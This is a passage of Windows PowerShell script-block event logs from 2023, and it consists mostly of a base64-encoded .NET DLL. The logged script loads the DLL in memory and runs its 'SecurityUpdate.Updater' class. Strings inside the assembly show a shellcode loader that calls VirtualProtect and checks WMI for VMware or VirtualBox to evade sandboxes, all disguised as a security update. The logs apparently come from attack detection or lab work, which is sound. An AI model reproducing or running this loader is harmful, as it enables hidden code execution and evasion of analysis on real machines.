GVTaXplPTMxOAA8TW9kdWxlPgA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz4AUEFHRV9FWEVDVVRFX1JFQUQAUEFHRV9HVUFSRABQQUdFX05PQ0FDSEUAUEFHRV9XUklURUNPTUJJTkUAUEFHRV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQBQQUdFX0VYRUNVVEUAUEFHRV9OT0FDQ0VTUwBQQUdFX1JFQURPTkxZAFBBR0VfV1JJVEVDT1BZAFBBR0VfRVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBtZXRob2QAc2hlbGxjb2RlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lRmllbGRIYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAVmFsdWVUeXBlAERpc3Bvc2UAU2VjdXJpdHlVcGRhdGUAU2hlbGxjb2RlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBBc3luY0NhbGxiYWNrAGNhbGxiYWNrAE1hcnNoYWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0ARW51bQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBNZW1vcnlQcm90ZWN0aW9uAFJ1bgBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IALmNjdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAENvbnRhaW5zAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBSdW50aW1lSGVscGVycwBscEFkZHJlc3MATWFuYWdlbWVudEJhc2VPYmplY3QATWFuYWdlbWVudE9iamVjdABvYmplY3QAbHBmbE9sZFByb3RlY3QAVmlydHVhbFByb3RlY3QAZmxOZXdQcm90ZWN0AEdldABvcF9FeHBsaWNpdABJQXN5bmNSZXN1bHQAcmVzdWx0AFRvVXBwZXJJbnZhcmlhbnQAU3lzdGVtLk1hbmFnZW1lbnQAZ2V0X0N1cnJlbnQATW92ZU5leHQASW5pdGlhbGl6ZUFycmF5AGtleQBvcF9FcXVhbGl0eQBTeXN0ZW0uU2VjdXJpdHkAAEVTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAAAZTQBhAG4AdQBmAGEAYwB0AHUAcgBlAHIAACttAGkAYwByAG8AcwBvAGYAdAAgAGMAbwByAHAAbwByAGEAdABpAG8AbgAAC00AbwBkAGUAbAAAD1YASQBSAFQAVQBBAEwAAA12AG0AdwBhAHIAZQAAFVYAaQByAHQAdQBhAGwAQgBvAHgAAAAAAJfu+fpX9upLomc2N49wqKYABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAQERQRgHDgISURJZEl0OAgIIAg8FRR0FGBEUEhAEIAASVQQgABJZBCAAEnkEIAEcDgMgAA4FAAICDg4EIAECDgMgAAIFAAEYDwEEAAEZCwgAARKAkRGAlQkAAhKAnRgSgJEJAAIBEoClEYCpCLd6XFYZNOCJCLA/X38R1Qo6BBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQCAAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAICeLgGAhFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucy5TZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORUBVAIQU2tpcFZlcmlmaWNhdGlvbgEDBh0FAwYRHAMGERgCBgkDBhEUAwAAAQoABAIYGREUEBEUBSACARwYByACEmUSaRwFIAEBEmUIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEABwEAAAAADQEACHRlc3RfZGxsAAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDIzAAApAQAkYzBhY2ZlMWEtODkwYi00MjYyLWI2ZTAtZDQ3ZTJhMTFlZTFkAAAMAQAHMS4wLjAuMAAATQEAHC5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC43LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lFC5ORVQgRnJhbWV3b3JrIDQuNy4yAAAAAAAAAHJrOrIAAAAAAgAAAF4AAAD0MQAA9BMAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAABSU0RTpF+pgKg3VkGPH6jBMiGAdAEAAABDOlxVc2Vyc1xBbnViaXNcc291cmNlXHJlcG9zXHRlc3RfZGxsXHRlc3RfZGxsXG9ialxEZWJ1Z1x0ZXN0X2RsbC5wZGIAejIAAAAAAAAAAAAAlDIAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIYyAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAAAA/yUAIAAQAAAAAEJ8J/Gec0wWErNKReeb81aYvyYa2L0b4kJqom1yvob13+in3b6y45L2RWjTPpxIj9o453RHeniyrpXpmhLKc+m/Ry64hpAW1ny2ASC6+jxxC3ygSQsOib+73pWzeDwOvFrMLqm6cv/5fI7BqjTXwg5BtyZJHL8t7mmGsyoaG3s2Xsv6qxVhxxKq6Ius6XnD3crjxXlHWe41mGYY/uEXQm8rKTgOS08q4/0CccEZznia2cHCIsxllh8euJxmDy5JqNLB1pTsUwHRlu/vAUuKraio2t5v7Bs5qz6unyQxJQrh/fvLh/sBWMuYr9lED76xuJnH3yGiUUntBYmqMDQyRpbR7JSVqgcdr5ndvk8IlLGoucfUF6EFBPo/pLd/MTUbr4r30YK/UlG416/LUjynorSk58gwuBZEjCKviy5qQQAAvpSl8Z5zLJ/3goohbMvD3cqzrUjMNmnKTd3oS0NBKskAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAABwDAAAAAAAAAAAAABwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAR8AgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABYAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAOgAJAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAHQAZQBzAHQAXwBkAGwAbAAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAOgANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAAB0AGUAcwB0AF8AZABsAGwALgBkAGwAbAAAAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMgAzAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABCAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAdABlAHMAdABfAGQAbABsAC4AZABsAGwAAAAAADIACQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAdABlAHMAdABfAGQAbABsAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAqDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">ef3681a9-511c-4f5f-8e6d-36ea42cae506</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 19:32:35.490919"></TimeCreated>
<EventRecordID>86</EventRecordID>
<Correlation ActivityID="{677bea27-53da-0001-010b-7c67da53d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="2108" ThreadID="7012"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACDqH+AAAAAAAAAAAOAAIiALATAAABYAAAAGAAAAAAAApjIAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAFIyAABPAAAAAEAAAHgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAC8MQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAEBQAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAHgDAAAAQAAAAAQAAAAYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAHAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACGMgAAAAAAAEgAAAACAAUAOCIAAIQPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBgCCAQAAAQAAEQAWCnIBAABwcxIAAAoLAAAHbxMAAApvFAAACgw4igAAAAhvFQAACnQXAAABDQAJckcAAHBvFgAACm8XAAAKbxgAAAoTBBEEcmEAAHAoGQAACiwhCXKNAABwbxYAAApvFwAACm8aAAAKcpkAAHBvGwAACi0qEQRyqQAAcG8bAAAKLRwJco0AAHBvFgAACm8XAAAKcrcAAHAoGQAACisBFxMFEQUsBQAXCisMAAhvHAAACjpr////3gsILAcIbx0AAAoA3ADeCwcsBwdvHQAACgDcBhMGEQYsBgA4owAAAAAWEwcrJQB+AQAABBEHfgEAAAQRB5F+AgAABBEHHyBdkWHSnAARBxdYEwcRByApAQAA/gQTCBEILcx+AQAABCUTCiwGEQqOaS0GFuATCSsLEQoWjyEAAAHgEwkAEQkoHgAAChMLEQt+AQAABI5paigfAAAKH0ASDCgCAAAGJhEL0AQAAAIoIAAACighAAAKdAQAAAITDRENbwYAAAYAABQTCgAqAAABHAAAAgAcAJy4AAsAAAAAAgAOALjGAAsAAAAAIgIoIgAACgAqyiA+AQAAjSEAAAEl0AMAAAQoIwAACoABAAAEHyCNIQAAASXQBAAABCgjAAAKgAIAAAQqQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAwAQAACN+AAAsBQAA7AYAACNTdHJpbmdzAAAAABgMAADQAAAAI1VTAOgMAAAQAAAAI0dVSUQAAAD4DAAAjAIAACNCbG9iAAAAAAAAAAIAAAFX3QI0CQIAAAD6ATMAFgAAAQAAACoAAAAHAAAAEAAAAAgAAAAJAAAAIwAAAAsAAAAQAAAAAQAAAAIAAAABAAAAAQAAAAEAAAACAAAAAQAAAAIAAAAEAAAAAABoBAEAAAAAAAYAggObBQYA7wObBQYAmgJpBQ8AuwUAAAYAwgKiBAYAZQOiBAYARgOiBAYA1gOiBAYAogOiBAYAuwOiBAYA2QKiBAYArgJ8BQYAcgJ8BQYADQOiBAYA9AIZBAYAkwTTBQYAKgPTBQYAgALcBgYAJwaHBAoA5ASVBgoAtASVBlcAKwUAAAoAHQaVBgYARQKHBAYAcAaHBAYAPASHBAYAjgSHBAYAVwKbBQYAEgKHBAoACAaVBgYANQSHBAYAzwGHBAYADQSHBAYAYgWHBAYAYQWHBAYAFwKHBAYA7gGHBAYAUwR8BQYATgKHBAYA7wWbBQYAxgaHBAYA2wGHBAAAAAC+AAAAAAABAAEAAAAQAP0EJAJNAAEAAQAAAQAAxwAAAE0AAwAFAAMBAAAzAgAAYQAFAAUAAgEAAM8EAABtAAUACQATAQAAQgAAAHUAEQAJABMBAACgAAAAdQARAAkAEQCvAXEBEQDMBnEBMwEBAHUBMwFfAHkBBgaXAX0BVoBIAYABVoDmAIABVoAxAYABVoCAAYABVoBVAYABVoBjAYABVoAiAYABVoBxAYABVoD4AIABVoADAYABVoAQAYABUCAAAAAAlgDgBIQBAQAAAAAAgACWIEQGiAEBAPwhAAAAAIYYVAUGAAUABSIAAAAAkRhaBYQBBQAAAAAAAwCGGFQFkwEFAAAAAAADAMYByAEGAAcAAAAAAAMAxgHDAZkBBwAAAAAAAwDGAbkBoQEJAAAAAQD+BQAAAgASBAAAAwBTBgIABAA1BgAAAQAuBgAAAgCoAQAAAQBKBAAAAgAuBgAAAQB9BgkAVAUBABEAVAUGABkAVAUKACkAVAUQADEAVAUQADkAVAUQAEEAVAUQAEkAVAUQAFEAVAUQAFkAVAUQAGEAVAUVAGkAVAUQAHEAVAUQAHkAVAUQAIkAVAUaAJEAVAUGAOEAVAUGAKEAVAUQAKEAYAY5AKkARgU+ALEApwZDAPEAfgRIAJkAMwRNAPkAIwVNAPkA0AZRAPkAhAZNAPkAygVXALEAswZcAAEBHAIGABEBZAZgABkBZAZmACEBAAJrADEBBQV0AJkAVAUGAEEBvAZ+AAkAGACaAAkAHACfAAkAIACkAAkAJACpAAkAKACuAAkALACzAAkAMAC4AAkANAC9AAkAOADCAAkAPADHAAkAQADMACcAgwCuAC4ACwCnAS4AEwCwAS4AGwDPAS4AIwDYAS4AKwDmAS4AMwDmAS4AOwDmAS4AQwDYAS4ASwDsAS4AUwDmAS4AWwDmAS4AYwAEAi4AawAuAi4AcwA7AmMAiwCuAAgABgDRAAEAIAAAAAYAAQA+AQAABwAgAFsEAAEFAEQGAQCwMgAAAwDwMwAABAAEgAAAAQAAAAAAAAAAAAAAAAB1BAAABAAAAAAAAAAAAAAAiACfAQAAAAAEAAAAAAAAAAAAAACRAJUGAAAAAAQAAgAFAAIABgADAAcAAwAAAAA3Q0Q2QTdBMTZBQkI4NEQ0NUNCMDEyRDNFQzEwQjEzMkU0MTE3NDMyRkVFNTUwRDNDNkI5RUJEODg1QUY0QTExAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MzIAQzI1NzRBNkFDNTczQkJBRDNBNTdBMUY3RDU1NjhCNjQ3MkQ5MjQ3NkUyMzJDNDE4RDQzOEI3QTY3NEMxREIyNwBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTMxOAA8TW9kdWxlPgA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz4AUEFHRV9FWEVDVVRFX1JFQUQAUEFHRV9HVUFSRABQQUdFX05PQ0FDSEUAUEFHRV9XUklURUNPTUJJTkUAUEFHRV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQBQQUdFX0VYRUNVVEUAUEFHRV9OT0FDQ0VTUwBQQUdFX1JFQURPTkxZAFBBR0VfV1JJVEVDT1BZAFBBR0VfRVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBtZXRob2QAc2hlbGxjb2RlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lRmllbGRIYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAVmFsdWVUeXBlAERpc3Bvc2UAU2VjdXJpdHlVcGRhdGUAU2hlbGxjb2RlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFNlY3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBBc3luY0NhbGxiYWNrAGNhbGxiYWNrAE1hcnNoYWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0ARW51bQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBNZW1vcnlQcm90ZWN0aW9uAFJ1bgBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IALmNjdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAENvbnRhaW5zAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBSdW50aW1lSGVscGVycwBscEFkZHJlc3MATWFuYWdlbWVudEJhc2VPYmplY3QATWFuYWdlbWVudE9iamVjdABvYmplY3QAbHBmbE9sZFByb3RlY3QAVmlydHVhbFByb3RlY3QAZmxOZXdQcm90ZWN0AEdldABvcF9FeHBsaWNpdABJQXN5bmNSZXN1bHQAcmVzdWx0AFRvVXBwZXJJbnZhcmlhbnQAU3lzdGVtLk1hbmFnZW1lbnQAZ2V0X0N1cnJlbnQATW92ZU5leHQASW5pdGlhbGl6ZUFycmF5AGtleQBvcF9FcXVhbGl0eQBTeXN0ZW0uU2VjdXJpdHkAAEVTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAAAZTQBhAG4AdQBmAGEAYwB0AHUAcgBlAHIAACttAGkAYwByAG8AcwBvAGYAdAAgAGMAbwByAHAAbwByAGEAdABpAG8AbgAAC00AbwBkAGUAbAAAD1YASQBSAFQAVQBBAEwAAA12AG0AdwBhAHIAZQAAFVYAaQByAHQAdQBhAGwAQgBvAHgAAAAAAJfu+fpX9upLomc2N49wqKYABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAQERQRgHDgISURJZEl0OAgIIAg8FRR0FGBEUEhAEIAASVQQgABJZBCAAEnkEIAEcDgMgAA4FAAICDg4EIAECDgMgAAIFAAEY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